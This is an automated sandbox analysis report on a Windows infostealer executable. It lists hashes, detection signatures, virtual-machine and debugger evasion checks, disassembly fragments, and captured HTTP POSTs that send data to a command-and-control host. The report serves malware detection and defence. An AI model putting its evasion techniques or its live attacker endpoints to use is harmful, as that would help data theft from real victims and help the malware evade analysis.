Windows Analysis Report
Yda6AxtlVP.exe

Overview

General Information

Sample name: Yda6AxtlVP.exe (renamed because the original name is a hash value)
Original sample name: 339948cf14bfed6a4e1cd717beeb9fff.exe
Analysis ID: 1579641
MD5: 339948cf14bfed6a4e1cd717beeb9fff
SHA1: 5579437dde79a533dd625fb7fb1ccdb6226e3364
SHA256: 6eb9cd9fe518bd6649b3db9de8478d7e8570fa22272b111a76c491749e049994
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Yda6AxtlVP.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\Yda6AxtlVP.exe" MD5: 339948CF14BFED6A4E1CD717BEEB9FFF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: Yda6AxtlVP.exe | Avira: detected
Source: Yda6AxtlVP.exe | ReversingLabs: Detection: 65%
Source: Yda6AxtlVP.exe | Virustotal: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Yda6AxtlVP.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_00D7DCF0
Source: Yda6AxtlVP.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_00DBA5B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00DBB560
Source: Yda6AxtlVP.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1; Host: home.fivetk5sb.top; Accept: */*; Content-Type: application/json; Content-Length: 442597
Source: global traffic | HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1; Host: home.fivetk5sb.top; Accept: */*; Content-Type: application/json; Content-Length: 209; Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E1A8C0 recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5sb.top
Source: unknown | HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1; Host: home.fivetk5sb.top; Accept: */*; Content-Type: application/json; Content-Length: 442597
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND; Server: nginx/1.22.1; Date: Mon, 23 Dec 2024 05:55:04 GMT; Content-Type: text/html; charset=utf-8; Content-Length: 207; Connection: close; Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGM
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGME_
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17
Source: Yda6AxtlVP.exe, 00000000.00000002.1452288617.0000000001CF9000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
Source: Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB173479675335a1
Source: Yda6AxtlVP.exe, 00000000.00000002.1452288617.0000000001CF9000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1421366033.0000000001CF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB17347967534fd4
Source: Yda6AxtlVP.exe, 00000000.00000003.1420608833.0000000001D55000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420788724.0000000001D58000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000002.1452479719.0000000001D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753?argument=
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753http://home.fivetk5sb.top/niCGMfnfOxUBXxpLhB
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Yda6AxtlVP.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: Yda6AxtlVP.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Yda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: Yda6AxtlVP.exe | Static PE information: section name: (empty)
Source: Yda6AxtlVP.exe | Static PE information: section name: .idata
Source: Yda6AxtlVP.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D94011
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D7F440
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D605B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D66FA0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E1B180
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D8F100
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E200E0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010DA000
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010DE050
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DB6210
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E1C320
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E20420
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010A4410
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010B6730
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010D4780
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5E620
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DBA7F0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E1C770
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D64940
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5A960
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E0C900
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_0100AB2C
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00F26AC0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010C8BF0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D5CBB0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00EE4B60
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_0100AAC0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010D4D40
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010CCD80
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010DCC90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010A2F90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_0106AE30
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E1EF90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E18F90
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D74F70
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D610E6
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010C35B0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010BD430
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010E17A0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010A56D0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010A9920
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E09880
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010C1BD0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D91BE0
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010D3A70
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D573F0 appears 110 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00E344A0 appears 69 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D95340 appears 43 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D94F40 appears 307 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00F2CBC0 appears 99 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D575A0 appears 646 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D950A0 appears 90 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D6CD40 appears 78 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00F07220 appears 91 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D571E0 appears 47 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D5CAA0 appears 62 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D6CCD0 appears 55 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D94FD0 appears 251 times
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: String function: 00D5C960 appears 32 times
Source: Yda6AxtlVP.exe | Static PE information: Section: agnlrrtx ZLIB complexity 0.9945160602247656
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Yda6AxtlVP.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Yda6AxtlVP.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Section loaded: kernel.appcore.dll
Source: Yda6AxtlVP.exe | Static file information: File size 4534272 > 1048576
Source: Yda6AxtlVP.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x28a000
Source: Yda6AxtlVP.exe | Static PE information: Raw size of agnlrrtx is bigger than: 0x100000 < 0x1c5400

Data Obfuscation

Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Unpacked PE file: 0.2.Yda6AxtlVP.exe.d50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agnlrrtx:EW;dgeihioi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agnlrrtx:EW;dgeihioi:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: Yda6AxtlVP.exe | Static PE information: real checksum: 0x454b48 should be: 0x45d9bf
Source: Yda6AxtlVP.exe | Static PE information: section name: (empty)
Source: Yda6AxtlVP.exe | Static PE information: section name: .idata
Source: Yda6AxtlVP.exe | Static PE information: section name: (empty)
Source: Yda6AxtlVP.exe | Static PE information: section name: agnlrrtx
Source: Yda6AxtlVP.exe | Static PE information: section name: dgeihioi
Source: Yda6AxtlVP.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D85DDA push ds; iretd 0_3_01D85E51
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D85BFA push esi; iretd 0_3_01D85C11
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D82745 push es; iretd 0_3_01D8274A
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D85C12 push ecx; iretd 0_3_01D85C29
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_3_01D87A12 pushfd ; retf 0_3_01D87A41
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_010D41D0 push eax; mov dword ptr [esp], edx 0_2_010D41D5
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DD2340 push eax; mov dword ptr [esp], 00000000h 0_2_00DD2343
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00E0C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_00E0C743
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00D90AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00D90AC4
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DB1430 push eax; mov dword ptr [esp], 00000000h 0_2_00DB1433
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DD39A0 push eax; mov dword ptr [esp], 00000000h 0_2_00DD39A3
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Code function: 0_2_00DADAD0 push eax; mov dword ptr [esp], edx 0_2_00DADAD1
Source: Yda6AxtlVP.exe | Static PE information: section name: agnlrrtx entropy: 7.955768774106295

Boot Survival

Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Yda6AxtlVP.exe, 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 15E803E second address: 15E8090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9665249A06h 0x00000009 popad 0x0000000a jmp 00007F9665249A03h 0x0000000f jmp 00007F96652499FDh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9665249A04h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1601061 second address: 1601065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16044D4 second address: 16044DE instructions: 0x00000000 rdtsc 0x00000002 je 00007F96652499FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1604615 second address: 160461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 160467D second address: 16046AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F96652499FCh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 nop 0x00000015 jnl 00007F96652499F9h 0x0000001b push 00000000h 0x0000001d push 9063CE38h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16046AD second address: 1604756 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F9665989DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 6F9C3248h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F9665989DA8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 sub ecx, 679F96E7h 0x00000038 push 00000003h 0x0000003a mov dx, A1E1h 0x0000003e push 00000000h 0x00000040 call 00007F9665989DB1h 0x00000045 jmp 00007F9665989DB9h 0x0000004a pop edi 0x0000004b mov dword ptr [ebp+12A029FAh], eax 0x00000051 push 00000003h 0x00000053 and dx, E28Eh 0x00000058 call 00007F9665989DA9h 0x0000005d jmp 00007F9665989DB1h 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 pop eax 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16048A5 second address: 16048AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 16048AA second address: 1604936 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9665989DACh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F9665989DB1h 0x00000011 jmp 00007F9665989DABh 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+12A026CEh], eax 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+12A026D9h], esi 0x00000026 push eax 0x00000027 movzx ecx, dx 0x0000002a pop ecx 0x0000002b push 00000003h 0x0000002d pushad 0x0000002e mov si, ax 0x00000031 mov dword ptr [ebp+12A02818h], edi 0x00000037 popad 0x00000038 call 00007F9665989DA9h 0x0000003d jmp 00007F9665989DB8h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F9665989DB7h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe | RDTSC instruction interceptor: First address: 1604936 second address: 1604949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96652499FFh 0x00000009 rdtsc
